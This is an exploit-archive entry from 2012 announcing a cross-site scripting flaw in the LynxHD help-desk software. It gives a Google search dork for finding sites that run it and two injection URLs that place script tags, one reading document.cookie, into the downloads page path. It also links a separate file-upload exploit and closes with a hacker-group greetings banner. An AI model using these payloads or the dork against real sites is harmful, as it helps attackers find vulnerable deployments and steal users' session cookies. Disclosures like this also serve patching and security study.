LynxHD <= v1.0 beta Xss Vulnerability



EKU-ID: 1908 CVE: OSVDB-ID:
Author: Elite Trojan Published: 2012-04-12 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##################################################
# Exploit Title: LynxHD <= v1.0 beta Xss Vulnerability
# Date: 11/04/2012
# Author: Elite Trojan
# Category:: webapps
# Download : http://sourceforge.net/projects/coldbrewhelpdes/files/LynxHD/LynxHD-1.0-RC1.zip/download
# Google dork: intext:"Powered by LynxHD"
# Tested on: linux + windows
##################################################

[~]Exploit/p0c :

http://site.com/downloads/index.php/'"()%26%251"><script>alert(document.cookie)</script>
\\
http://site.com/downloads/index.php/index.php/>"><ScRiPt>alert(Dz Mafia)</ScRiPt>
\\
Remote File upload vulnerability on the same version :
http://www.1337day.com/exploits/18024 (by L3b-r1'z)

+--------------------------------------------------+
[»]                    #-DzMafia-#
[»] We are : password, eliteTrojan, gel-dz, BackUp
+--------------------------------------------------+
F0llow Us at : www.fb.me/Ma.dz.fia
+---------------------------------------------------+
[»] Greetz to :
[ TrOon,Aghilas,r00t_dz,Hacker-fire,Vaga-hacker,Imed Lakamora ]
[ & -> !Muslims!,Mosta,team152,Inj3ct0r ]
[ And all my Freinds + Algerian Hackers ]
-----------------------------------------------------+
DzMafia © 2012 All rights reserved.